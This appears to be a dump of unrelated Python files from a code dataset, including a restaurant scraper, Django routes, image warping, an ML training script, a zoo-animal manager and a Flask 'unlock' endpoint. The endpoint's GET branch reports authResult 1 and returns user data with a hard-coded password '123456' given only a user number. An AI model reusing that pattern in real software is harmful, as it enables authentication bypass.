total_image)\nprint(\"accurance:\",1-wrong_detects/total_image)\n","sub_path":"haar_code.py","file_name":"haar_code.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232197572","text":"#! /usr/bin/python3\n\nimport bs4, requests, os, pyperclip, csv\n\n#get webPage address go scrape from clipboard\n\naddress = pyperclip.paste();\n\nres = requests.get(address)\n\nres.raise_for_status()\n\n#formats web Page\npage = bs4.BeautifulSoup(res.text, \"lxml\")\npage.prettify()\ntype(page)\n\n#scrapes for restaurant page and writes to csv file\nnameArray = []\nfor span in page.find_all(\"a\", \"biz-name\"):\n page.strippedstrings\n nameArray.append(span.text)\n\n#scrapes for addresses and writes to csv file\naddressArray = []\nfor address in page.find_all(\"address\"):\n page.strippedstrings\n addressArray.append(address.text)\n\n#scrapes for phone numbers and writes to csv file\nphoneArray = []\nfor span in page.find_all(\"span\", \"biz-phone\"):\n page.strippedstrings\n phoneArray.append(span.text)\n\n#writes list to file called restaurant.csv\nf = open('restaurant.csv', 'a')\nfor i in range(len(nameArray)):\n f.write(nameArray[i] + \"\\n\")\nf.close()\n\nf = open('phone.csv', 'a')\nfor i in range(len(phoneArray)):\n f.write(phoneArray[i] + \"\\n\")\nf.close()\n\nf = open('address.csv', 'a')\nfor i in range(len(addressArray)):\n f.write(addressArray[i] + \"\\n\")\nf.close()\n","sub_path":"restaurantScrape.py","file_name":"restaurantScrape.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159885786","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom match.api import PlayerViewSet, TeamGameViewSet, OfficialGameViewSet, MatchViewSet\n\napp_name = 'match'\n\nrouter = DefaultRouter()\nrouter.register('players', 
PlayerViewSet)\nrouter.register('team_games', TeamGameViewSet)\nrouter.register('official_games', OfficialGameViewSet)\nrouter.register('matches', MatchViewSet)\n\n# kudos to https://www.webforefront.com/django/consolidatedjangourls.html for help\n# on url consolidation, can use include with list of url patterns\napi_urlpatterns = [\n\n]\n\napi_urlpatterns = api_urlpatterns + router.urls\n\nurlpatterns = [\n path('api/', include((api_urlpatterns, 'api'), namespace='api'))\n]","sub_path":"match/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500972917","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 16 17:00:38 2016\r\n\r\n@author: Rebecca\r\n\"\"\"\r\n\r\nfrom PIL import Image \r\nfrom pylab import *\r\nfrom numpy import *\r\n\r\nsource = []\r\ndestination = []\r\nim = array(Image.open('hillary.jpg'))\r\nnewim = zeros(im.shape)\r\nimshow(im)\r\ninpu = ginput(2)\r\n\r\n#corner points\r\nsource.append([0,0])\r\nsource.append([0,len(im[0])])\r\nsource.append([len(im),0])\r\nsource.append([len(im),len(im[0])])\r\n\r\ndestination.append([0,0])\r\ndestination.append([0,len(im[0])])\r\ndestination.append([len(im),0])\r\ndestination.append([len(im),len(im[0])])\r\n\r\n#ginput recieves coordinates as y,x\r\ninX = inpu[0][1]\r\ninY = inpu[0][0]\r\nsource.append([inX,inY])\r\n\r\ninX2 = inpu[1][1]\r\ninY2 = inpu[1][0]\r\ndestination.append([inX2,inY2])\r\n\r\n#Added by Angel\r\ndisp = subtract(source, destination)\r\n\r\nweight = []#array(im.shape)\r\nfor r in range(len(im)):\r\n for c in range(len(im[0])):\r\n distance = zeros(len(destination))\r\n for dest in range(len(destination)):\r\n distance[dest] = (sqrt(pow(r-destination[dest][0],2) + pow(c-destination[dest][1],2)))\r\n #print \" \"\r\n weight = 1/(distance + 0.0000001)\r\n weight = weight/sum(weight)\r\n newx = r + dot(weight, disp)[0]\r\n newy = c +dot(weight, disp)[1]\r\n 
'''\r\n print (newx, newy)\r\n print(\"~~~~\")\r\n '''\r\n if (newx < len(im)-1 and newy < len(im[0])-1):\r\n newim[r][c] = im[newx][newy]\r\n else:\r\n newim[r][c] = im[0][0]\r\nscipy.misc.imsave('warped.jpg', newim)\r\nimshow(newim)\r\n ","sub_path":"Python/Lab_3/imagewarping.py","file_name":"imagewarping.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570405796","text":"from MW_datatypes import *\n\ngamemode = 1\nisFull = 1\nlightingmode = 0\n\nif isFull:\n DISPLAY_FLAGS = pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.FULLSCREEN\nelse:\n DISPLAY_FLAGS = pygame.HWSURFACE|pygame.DOUBLEBUF\nif gamemode == 1:\n SCREEN_SIZE = WIDTH, HEIGHT = 640,480\n LIGHTING = 1\n CAMERA_MODE = \"force\"\nelif gamemode == 2:\n SCREEN_SIZE = WIDTH, HEIGHT = 1200,800\n LIGHTING = 0\n CAMERA_MODE = \"nothing\"\nelif gamemode == 3:\n SCREEN_SIZE = WIDTH, HEIGHT = 800,600\n LIGHTING = 0\n CAMERA_MODE = \"nothing\"\nelif gamemode == 4:\n SCREEN_SIZE = WIDTH, HEIGHT = 1200,800\n LIGHTING = 0\n CAMERA_MODE = \"force\"\n\nFRAMERATE = 25\nMSPERFRAME = 1000/FRAMERATE\nTILING_SIZE = Vector2d(20,20)\n\n\n#colors\nCOLOR_RED = 255,0,0\nCOLOR_WHITE = 255,255,255\nCOLOR_LIGHT_BLUE = 127,127,255\nCOLOR_BLACK = 0,0,0\nCOLOR_GREEN = 0,255,0\nCOLOR_DARK = 100,100,100\nCOLOR_KEY = COLOR_BLACK\n\n#game constants\nTORCH_RADIUS = 100,150\nPLAYER_LIGHT_RADIUS = 50,75\n\nMAN_START = Vector2d(-540,-40)\nWOMAN_START = Vector2d(-780,-40)\n#MAN_START = Vector2d(600,1640)\n#WOMAN_START = Vector2d(0,1280)\n#MAN_START = Vector2d(1300,1920) #exit\n#WOMAN_START = Vector2d(-320,840)\n#MAN_START = Vector2d(760,740)\n#MAN_START = Vector2d(520,1280)\n\nSHADOW_LADY_START = Vector2d(120,-300)\n\n#engine constants\ndirMap = dict()\ndirMap[\"RIGHT\"] = 1\ndirMap[\"LEFT\"] = -1\n\n\ndef blankfcn(arg01 = None, arg02 = None):\n 
pass\n","sub_path":"src/MW_constants.py","file_name":"MW_constants.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124592805","text":"from gekko import GEKKO\n\nm = GEKKO() # create GEKKO model\n\nprint('--------- Follow local path to view files --------------')\nprint(m.path) # show source file path\nprint('--------------------------------------------------------')\n\n# test application\nu = m.FV(value=5, name='u') # define fixed value\nx = m.SV(name='state') # define state variable\nm.Equation(x == u) # define equation\nm.options.COLDSTART = 1 # coldstart option\nm.options.DIAGLEVEL = 0 # diagnostic level (0-10)\nm.options.MAX_ITER = 500 # adjust maximum iterations\nm.options.SENSITIVITY = 1 # sensitivity analysis\nm.options.SOLVER = 1 # change solver (1=APOPT,3=IPOPT)\nm.solve(disp=True) # solve locally (remote=False)\nprint('x: ' + str(x.value)) # print variable value\n","sub_path":"Week1/Gekko Examples/18_debugging_resources.py","file_name":"18_debugging_resources.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"6556517","text":"import re\nimport collections\nfrom collections import Counter\nimport jieba\n\ndef stats_text_ch(text):\n cut_list = []\n word_list = []\n count_list = []\n\n ch_pattern = re.compile(r'[\\u4e00-\\u9fa5]')\n text_ch = re.findall(ch_pattern,text)\n\n text_cut = ''.join(text_ch) #把筛选返回的list转为str\n\n cut_list = jieba.cut(text_cut,cut_all=False) #使用jieba精准模式分词\n\n for word in cut_list:\n if len(word)>=2:\n word_list.append(word)\n count_list=Counter(word_list).most_common(20)\n return count_list\n\n\n ","sub_path":"19100401/haijun-zhang/d10/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"599836310","text":"import problem\n\n\nclass Six(problem.Problem):\n\n def __init__(self):\n super(Six, self).__init__(\n 6,\n \"\"\"\n The sum of the squares of the first ten natural numbers is,\n\n 1**2 + 2**2 + ... + 10**2 = 385\n The square of the sum of the first ten natural numbers is,\n\n (1 + 2 + ... + 10)**2 = 55**2 = 3025\n Hence the difference between the sum of the squares\n of the first ten natural numbers and the square of the sum is 3025 − 385 = 2640.\n\n Find the difference between the sum of the squares\n of the first one hundred natural numbers and the square of the sum.\n \"\"\",\n 25164150)\n\n def calculate_answer(self):\n square_of_sum = 0\n\n for i in range(1, 101):\n square_of_sum += i\n\n square_of_sum **= 2\n\n return square_of_sum - self.sum_of_squares(100)\n\n def sum_of_squares(self, number):\n if number is 0:\n return 0\n return number ** 2 + self.sum_of_squares(number - 1)","sub_path":"problems/six.py","file_name":"six.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553660516","text":"__author__ = 'ashabou'\n\nimport argparse\nimport os\nimport glob\nimport time\nimport logging\nimport json\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import Normalizer\nfrom lib import deeplearning\n\nfrom lib import descriptors\n\n\nlogging.basicConfig(level=0)\nlogger = logging.getLogger('TRAIN')\n\ndescriptors = {name.replace(\"DESC_\", \"\"): descriptor for name, descriptor in descriptors.__dict__.items() if name.startswith('DESC_')}\nmodels = {\"forest\": RandomForestClassifier, \"svm\": SVC, \"dnn\": deeplearning.DeepLearning}\n\n\nlogger.info(\"possible descriptors %s\" %descriptors)\n\nargument_parser = argparse.ArgumentParser(description='train 
classifier')\n\nargument_parser.add_argument('--train-dir',\n dest='train_dir',\n type=str,\n default=None,\n help='path to train directory')\n\nargument_parser.add_argument('--model-dir',\n dest='model_dir',\n type=str,\n default=None,\n help='path to the generated model directory')\n\nargument_parser.add_argument('--descriptor',\n dest='descriptor',\n choices=descriptors,\n default=None,\n help='descriptor for image')\n\nargument_parser.add_argument('--model',\n dest='model',\n choices=models,\n default=None,\n help='learning method')\n\nargument_parser.add_argument('--stats',\n dest='stats',\n default=1,\n help='stats infos for debug')\n\nargs = argument_parser.parse_args()\n\nif __name__ == '__main__':\n\n #check args\n logger.debug(\"Check directories...\")\n if not args.train_dir:\n argument_parser.error(\"missing train directory\")\n if not args.model_dir:\n argument_parser.error(\"missing model directory\")\n\n #check output dir\n logger.debug(\"Create new model dir...\")\n if os.path.isdir(args.model_dir):\n new_name = args.model_dir+time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.gmtime())\n logger.debug(\"backup old model-dir in %s\" %new_name )\n os.rename(args.model_dir, new_name )\n os.makedirs(args.model_dir)\n\n #list classes\n list_classes = os.listdir(args.train_dir)\n logger.info(\"classes are : %s\" %list_classes)\n\n #use descriptor\n desc=None\n if args.descriptor:\n desc = descriptors.get(args.descriptor)\n logger.info(\"using descriptor %s\" %args.descriptor)\n else:\n logger.info(\"No descriptor is used\")\n\n #create dataframe\n logger.info(\"create data frame for training...\")\n train_df = pd.DataFrame(columns=[\"path\", \"desc\", \"class\"])\n\n for cls in list_classes:\n list_images_paths = glob.glob(os.path.join(args.train_dir, cls, \"*.*\"))\n for id in xrange(len(list_images_paths)):\n\n descvect=None\n if desc is not None:\n descvect = desc(list_images_paths[id]).run()\n\n train_df.loc[len(train_df)+1] = [list_images_paths[id], 
str(descvect) , cls]\n\n logger.info(\"save the data frame...\")\n train_df.to_csv(os.path.join(args.model_dir, \"train_df.csv\"),header=False)\n\n\n\n #training model\n ml = models.get(args.model)\n logger.info(\"Model is %s\" %args.model)\n\n #labels\n labels = train_df[\"class\"].as_matrix()\n\n #descriptors if exist\n vectors=None\n norm=None\n if desc:\n def str_column_to_array(df_column):\n lst=[]\n df_column.apply(lambda row: lst.append(np.array([float(elem) for elem in row.strip('[').strip(']').split(\",\")])))\n return lst\n\n vectors = str_column_to_array(train_df[\"desc\"])\n\n norm=\"l1\"\n if norm is not None:\n normalizer = Normalizer(norm)\n vectors = normalizer.fit_transform(vectors)\n\n logger.debug(\"Training...\")\n if desc:\n #taining and ml algo on vectors\n model = ml().fit(vectors, labels)\n else:\n if args.model!=\"dnn\":\n raise NotImplementedError(\"non dnn model is not proposed for direct images\")\n #training raw data only with dnn\n if args.stats:\n model = ml(args.model_dir).fitdata(train_df[\"path\"].tolist(), labels)\n else:\n model = ml().fitdata(train_df[\"path\"].tolist(), labels)\n\n\n logger.info(\"Save model...\")\n os.makedirs(os.path.join(args.model_dir, \"model\"))\n joblib.dump(model, os.path.join(args.model_dir, \"model\", \"model.pkl\"))\n\n with open(os.path.join(args.model_dir,\"model.json\"),'w') as jsonfile:\n json.dump({'descriptor': None if not desc else desc.__name__, 'model': ml.__name__, 'normalizer': norm}, jsonfile)\n","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326489116","text":"# 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。 \n# \n# 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。 \n# \n# 你可以假设除了整数 0 之外,这个整数不会以零开头。 \n# \n# 示例 1: \n# \n# 输入: [1,2,3]\n# 输出: [1,2,4]\n# 解释: 输入数组表示数字 123。\n# \n# \n# 示例 2: \n# \n# 输入: [4,3,2,1]\n# 输出: [4,3,2,2]\n# 解释: 输入数组表示数字 4321。\n# \n# Related Topics 
数组\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution:\n #直接转化为数字加一再转化为数组\n # def plusOne(self, digits: List[int]) -> List[int]:\n # num = 0\n # result = []\n # for index, digist in enumerate(digits):\n # num = num + digist * 10 ** (len(digits) - index - 1)\n # num = num + 1\n # while num:\n # result_index = num % 10\n # num = int(num // int(10))\n # result.append(result_index)\n # result.reverse()\n # return result\n def plusOne(self, digits: List[int]) -> List[int]:\n l = len(digits)\n if l == 0:\n return [1]\n for i in range (l-1, -1, -1):\n if digits[i] != 9:\n digits[i] = digits[i]+1\n return digits\n else:\n digits[i] = 0\n digits.insert(0, 1) #该方法是python内置方法,运行速度很快\n return digits\n\n# leetcode submit region end(Prohibit modification and deletion)\n\nif __name__ == '__main__':\n digist = [9]\n solution = Solution()\n print(solution.plusOne(digist))\n","sub_path":"Week_01/leetcode/editor/cn/[66]加一.py","file_name":"[66]加一.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490011167","text":"from Class import Animal\r\n\r\ndef menuChoice(nChoices):\r\n\t#used to collect the inputs for menuchoices\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tchoice = input(\"Choose an alternative: \")\r\n\t\t\tchoice = int(choice)\r\n\t\t\tif choice<=nChoices and choice>0:\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Choose a valid option \")\r\n\t\texcept ValueError:\r\n\t\t\tprint(\"Invalid Input \")\r\n\treturn choice\r\n\r\ndef readFile(fileName):\r\n\t#reads external files and returns the values in the form of a list\r\n\tlist=[]\r\n\twith open(str(fileName)+\".txt\", \"r\") as externalFile:\r\n\t\tfor line in externalFile:\r\n\t\t\tcurrentLine=line.rstrip(\"\\n\")\r\n\t\t\tlist.append(currentLine)\r\n\treturn list\r\n\r\ndef createObjects():\r\n\t#creates all the animal objects from an externally saved 
file\r\n\tlsInfo=readFile(\"animals\")\r\n\tlist=[]\r\n\tlsObjects=[]\r\n\tfor n in range(len(lsInfo)):\r\n\t\tline=lsInfo[n].split(\", \")\r\n\t\tlist.append(line)\r\n\tfor n in range(len(list)):\r\n\t\tanimal=Animal(list[n][0],list[n][1],int(list[n][2]),list[n][3])\r\n\t\tlsObjects.append(animal)\r\n\treturn lsObjects\r\n\r\n\"\"\"def addAnimal():\r\n\t#menu that creats new animal objects and appends them to the list\r\n\tn=0\r\n\tfor species in lsSpecies:\r\n\t\tn+=1\r\n\t\tprint(\"%s. %s\" % (n,species))\r\n\tspeciesChoice=menuChoice(n)-1\r\n\tprint(\"\"\"\r\n\"\"\"Choose Gender:\r\n1. Male [M]\r\n2. Female [F]\"\"\"\r\n\"\"\")\r\n\tgender=menuChoice(2)\r\n\tif gender==1:\r\n\t\tgender=\"M\"\r\n\tif gender==2:\r\n\t\tgender=\"F\"\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tage=input(\"Input Age: \")\r\n\t\t\tage=int(age)\r\n\t\t\tbreak\r\n\t\texcept ValueError:\r\n\t\t\tprint(\"Choose a number \")\r\n\tunique=False\r\n\twhile unique==False:\r\n\t\tunique\t=True\r\n\t\tx=int(0)\r\n\t\tname=str(input(\"Choose a name: \")).title()\r\n\t\tfor animal in lsAnimals:\r\n\t\t\tif animal.name!=name:\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Choose an unique name \")\r\n\t\t\t\tunique=False\r\n\t\t\r\n\t\t\t\r\n\tanimal=Animal(name, lsSpecies[speciesChoice], age, gender)\r\n\treturn animal\"\"\"\r\n\r\ndef start():\r\n\t#starts the main functions with the values from external files\r\n\tlsSpecies=readFile(\"species\")\r\n\tlsAnimals=createObjects()\r\n\tmaxCap=int(readFile(\"maxCap\")[0])\r\n\tmainMenu(lsSpecies, lsAnimals, maxCap)\r\n\r\ndef saveFile(lsAnimals):\r\n\t#saves the objects in the list in a external file\r\n\twith open(\"animals.txt\", \"w\") as externalFile:\r\n\t\tfor animal in lsAnimals:\r\n\t\t\texternalFile.write(\"%s, %s, %s, %s\\n\" % (animal.name, animal.species, animal.age, animal.gender))\r\n\r\n\r\ndef search(lsAnimals):\r\n\t#search the list with the parameter that the user chooses\r\n\twhile True:\r\n\t\tsearchParameter=str(input('Search or 
type \"cancel\" to exit: ')).title()\r\n\t\tchosenAnimal=[]\r\n\t\tfor animal in lsAnimals:\r\n\t\t\tif searchParameter==animal.name:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telif searchParameter==animal.age:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telif searchParameter==animal.gender:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telif searchParameter==animal.species:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\tif searchParameter==\"Cancel\":\r\n\t\t\tbreak\r\n\t\telif chosenAnimal==[]:\r\n\t\t\tprint(\"The animal doesn´t exist, try again \")\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn chosenAnimal\r\n\r\ndef overviewMenu(lsAnimals, ascending):\r\n\t#the menu which the user chooses parameter to sort by\r\n\twhile True:\r\n\t\tprint(\"\"\"\r\nSort by:\r\n1. Name\r\n2. Age\r\n3. Gender\r\n4. Species\r\n\r\n5. Previous Menu\"\"\")\r\n\r\n\t\tchoice=menuChoice(5)\r\n\t\tif choice==1:\r\n\t\t\tprintOverview(lsAnimals, \"name\", ascending)\r\n\t\telif choice==2:\r\n\t\t\tprintOverview(lsAnimals, \"age\", ascending)\r\n\t\telif choice==3:\r\n\t\t\tprintOverview(lsAnimals, \"gender\", ascending)\r\n\t\telif choice==4:\r\n\t\t\tprintOverview(lsAnimals, \"species\", ascending)\r\n\t\telif choice==5:\r\n\t\t\tbreak\r\n\treturn lsAnimals\r\n\r\n\r\n\"\"\"def printOverview(lsAnimals, searchParameter=\"name\", ascending=False):\r\n\t#prints all the animals in a userchosen order\r\n\tsortedList=sorted(lsAnimals, key=lambda animal: getattr(animal, searchParameter), reverse=ascending)\r\n\tif searchParameter==\"name\" or searchParameter==\"age\":\r\n\t\tfor n in range(len(sortedList)):\r\n\t\t\tanimal=sortedList[n]\r\n\t\t\tprint(\"%s) %s (%s, %s y/o, %s)\" % (n+1, animal.name, animal.species, animal.age, animal.gender))\r\n\telif searchParameter==\"gender\" or searchParameter==\"species\":\r\n\t\tlsCategories=[]\r\n\t\tfor animal in sortedList:\r\n\t\t\tlsCategories.append(getattr(animal, 
searchParameter))\r\n\t\tuniqueCategories=set(lsCategories)\r\n\t\tfor category in uniqueCategories:\r\n\t\t\tprint(\"\"\"\r\n\"\"\"+str(category)+\"\"\"\"\"\":\"\"\" \"\"\")\r\n\t\t\tfor animal in sortedList:\r\n\t\t\t\tif getattr(animal, searchParameter)==category:\r\n\t\t\t\t\tprint(animal.name)\"\"\"\r\n\r\ndef ascending(lsAnimals):\r\n\t#choose which way you want to sort the list, in ascending or descending order\r\n\twhile True:\r\n\t\tprint(\"\"\"\r\n1. Ascending\r\n2. Descending\r\n\r\n3. Previous Menu\"\"\")\r\n\t\tascending=False\r\n\t\tchoice=menuChoice(3)\r\n\t\tif choice==1:\r\n\t\t\tascending=False\r\n\t\telif choice==2:\r\n\t\t\tascending=True\r\n\t\telif choice==3:\r\n\t\t\tbreak\r\n\t\toverviewMenu(lsAnimals, ascending)\t\r\n\r\n\"\"\"def removeAnimal(lsAnimals):\r\n\t#prints the list of animals and lets the user choose an animal to delete, also possible to return to main menu\r\n\tprintOverview(lsAnimals)\r\n\tprint(\"\"\"\r\n\"\"\"%s) Return to Main Menu\"\"\"\r\n\"\"\" % (len(lsAnimals)+1))\r\n\tuserInput=menuChoice(len(lsAnimals)+1)\r\n\tif userInput!=len(lsAnimals)+1:\r\n\t\tanimalToDelete=userInput-1\r\n\t\tlsAnimals.pop(animalToDelete)\r\n\treturn lsAnimals\"\"\"\r\n\r\ndef checkUnique(lsAnimals, argument):\r\n\t#checks if attributes of an object in a list are unique, returns all unique attributes\r\n\toutput=[]\r\n\tseen=set()\r\n\tfor animal in lsAnimals:\r\n\t\tobject=getattr(animal, argument)\r\n\t\tif object not in seen:\r\n\t\t\toutput.append(object)\r\n\t\t\tseen.add(object)\r\n\t\telif object in seen:\r\n\t\t\toutput.remove(object)\r\n\treturn output\r\n\r\n\r\ndef recommendations(lsAnimals, maxCap, lsSpecies):\r\n\t#gives recommendations based on the maxCap and the list\r\n\tif len(lsAnimals)<=maxCap:\r\n\t\tlonelySpecies=[]\r\n\t\tfor species in lsSpecies:\r\n\t\t\tlsGenders=[]\r\n\t\t\tfor animal in lsAnimals:\r\n\t\t\t\tif animal.species==species:\r\n\t\t\t\t\tlsGenders.append(animal.gender)\r\n\t\t\tif 
len(set(lsGenders))==1:\r\n\t\t\t\tfor gender in lsGenders:\r\n\t\t\t\t\tif gender==\"F\":\r\n\t\t\t\t\t\tlonelySpecies.append(\"%s, M\" %(species))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tlonelySpecies.append(\"%s, F\" %(species))\r\n\t\tprint(\"You should buy:\")\r\n\t\tcounter=0\r\n\t\tfor object in lonelySpecies:\r\n\t\t\tcounter+=1\r\n\t\t\tprint(\"%s) %s\"%(counter, object))\r\n\r\n\tif len(lsAnimals)>=maxCap:\r\n\t\t#recommendations for deleting animals\r\n\t\tnumberOfAnimalsPerSpecies=[]\r\n\t\ttempList=[]\r\n\t\tfor species in lsSpecies:\r\n\t\t\tspeciesCounter=0\r\n\t\t\tfor animal in lsAnimals:\r\n\t\t\t\tif animal.species==species:\r\n\t\t\t\t\tspeciesCounter+=1\r\n\t\t\t\tnumberOfAnimalsPerSpecies.append(\"*%ss* (You have: %s)\"%(species, speciesCounter))\r\n\t\tfor item in numberOfAnimalsPerSpecies:\r\n\t\t\tif int(item[-2])>2:\r\n\t\t\t\ttempList.append(item)\r\n\t\tprint(\"You could remove some of these animals:\")\r\n\t\tfor item in tempList:\r\n\t\t\tprint(item)\r\n\t\t\t\t\r\ndef mainMenu(lsSpecies, lsAnimals, maxCap):\r\n\t#main menu of the program\r\n\twhile True:\r\n\t\tprint(\"\"\"\r\n1. Add Animal\r\n2. Remove Animals\r\n3. Overview\r\n4. Search\r\n5. Recommendations\r\n\r\n6. 
Save and Exit\"\"\")\r\n\t\tchoice=menuChoice(6)\r\n\t\tif choice==1:\r\n\t\t\t#Add Animal\r\n\t\t\tif len(lsAnimals) 0 else \"\",\r\n 'recordTime': TimeHelper.formatTime(ret['recordTime']),\r\n # 'roles': roles,\r\n 'userID': ret['userID'],\r\n 'password': \"123456\",\r\n 'username': ret['userName'],\r\n 'menus': d\r\n },\r\n 'rights': 0\r\n }\r\n return json.dumps(result)\r\n elif request.method == 'GET':\r\n userID = request.args.get(\"usernum\")\r\n system = request.args.get(\"name\")\r\n r = PersonManager.getUserByUserID(userID)\r\n if r.Suc and r.Rows > 0:\r\n ret = r.Result[0]\r\n roles = PersonManager.getUserRoles(ret['id'])\r\n ret = PersonManager.getUser(ret['id']).Result[0]\r\n # roles = PersonManager.getUserRoles(254)\r\n # ret = PersonManager.getUser(254).Result[0]\r\n ctrls = []\r\n for role in roles:\r\n keys = RoleManager().getKeysByRoleID(role['id']).Result\r\n for k in keys:\r\n ctrlIDs = KeyManager().getCtrlByKeyID(k['keyID'])\r\n for cID in ctrlIDs.Result:\r\n ctrls.append(ControlManager().get(cID['controlID']).Result[0])\r\n sysMap = []\r\n dataMap = {}\r\n r = []\r\n data = {}\r\n for ctrl in ctrls:\r\n if ctrl['system'] not in sysMap:\r\n sysMap.append(ctrl['system'])\r\n dataMap[ctrl['menuID']] = ctrl['menuID']\r\n system = ctrl['system']\r\n data[system] = [ctrlFormat(ctrl)['id']]\r\n else:\r\n system = ctrl['system']\r\n data[system].append(ctrlFormat(ctrl)['id'])\r\n\r\n d = []\r\n\r\n if system in data.keys():\r\n ids = data[system]\r\n for cID in ids:\r\n rt = ControlManager().getSortBySystem({'system': system, 'id': cID}).Result\r\n if not rt:\r\n continue\r\n rt = rt[0]\r\n rt['menuPercode'] = rt['flag']\r\n rt['menuName'] = rt['name']\r\n rt['menuId'] = rt['menuID']\r\n rt['parentId'] = rt['parentID']\r\n rt['menuState'] = rt['status']\r\n rt['menuUrl'] = rt['detail']\r\n rt.pop(\"flag\", True)\r\n rt.pop(\"parentID\", True)\r\n rt.pop(\"system\", True)\r\n rt.pop(\"status\", True)\r\n rt.pop(\"name\", True)\r\n rt.pop(\"detail\", 
True)\r\n rt.pop(\"menuID\", True)\r\n rt.pop(\"id\", True)\r\n d.append(rt)\r\n\r\n dep = DepartmentManager.getDepartment(ret['departmentID']).Result\r\n result = {\r\n 'authResult': 1,\r\n 'userInfo': {\r\n 'userName': ret['userName'],\r\n 'loginName': ret['loginName'],\r\n 'gender': formatSex(ret['gender']),\r\n 'department': dep[0]['name'] if len(dep) > 0 else \"\",\r\n 'recordTime': TimeHelper.formatTime(ret['recordTime']),\r\n # 'roles': roles,\r\n 'userID': ret['userID'],\r\n 'password': \"123456\",\r\n 'username': ret['userName'],\r\n 'menus': d\r\n },\r\n 'rights': 0\r\n }\r\n # print(result)\r\n return json.dumps(result)\r\n else:\r\n return jsonify({})\r\n else:\r\n return json.dumps({'status': 1, 'error': '提交数据格式不正确'})\r\n","sub_path":"Blueprint/unlock.py","file_name":"unlock.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643952149","text":"def DAFScriptMain(config, parameter, returnpacket):\r\n # config: ISysConfig object\r\n # parameter: TPClassUIDataPacket\r\n # returnpacket: TPClassUIDataPacket (undefined structure)\r\n\r\n strSQL = '\\\r\n select max(periode_code) lastyear \\\r\n from AccountingYear'\r\n resSQL = config.CreateSQL(strSQL).RawResult\r\n\r\n if resSQL.lastyear == None:\r\n raise '\\n Tahun terakhir tidak ditemukan.\\n'\r\n\r\n periode_code = resSQL.lastyear\r\n \r\n oAccountingYear = config.CreatePObjImplProxy('AccountingYear')\r\n oAccountingYear.Key = periode_code\r\n if oAccountingYear.Periode_Status == 'A':\r\n raise '\\n Tahun terakhir berstatus aktif.\\n'\r\n\r\n config.BeginTransaction()\r\n try:\r\n\r\n strSQL = '\\\r\n select count(journal_no) countjournal \\\r\n from Journal \\\r\n where fl_accountingyear = \\'%s\\'' \\\r\n % (periode_code)\r\n resSQL = config.CreateSQL(strSQL).RawResult\r\n if resSQL.countjournal > 0:\r\n raise '\\n Tahun telah digunakan oleh salah satu jurnal.\\n'\r\n \r\n strSQLDelAccDay = 'delete from 
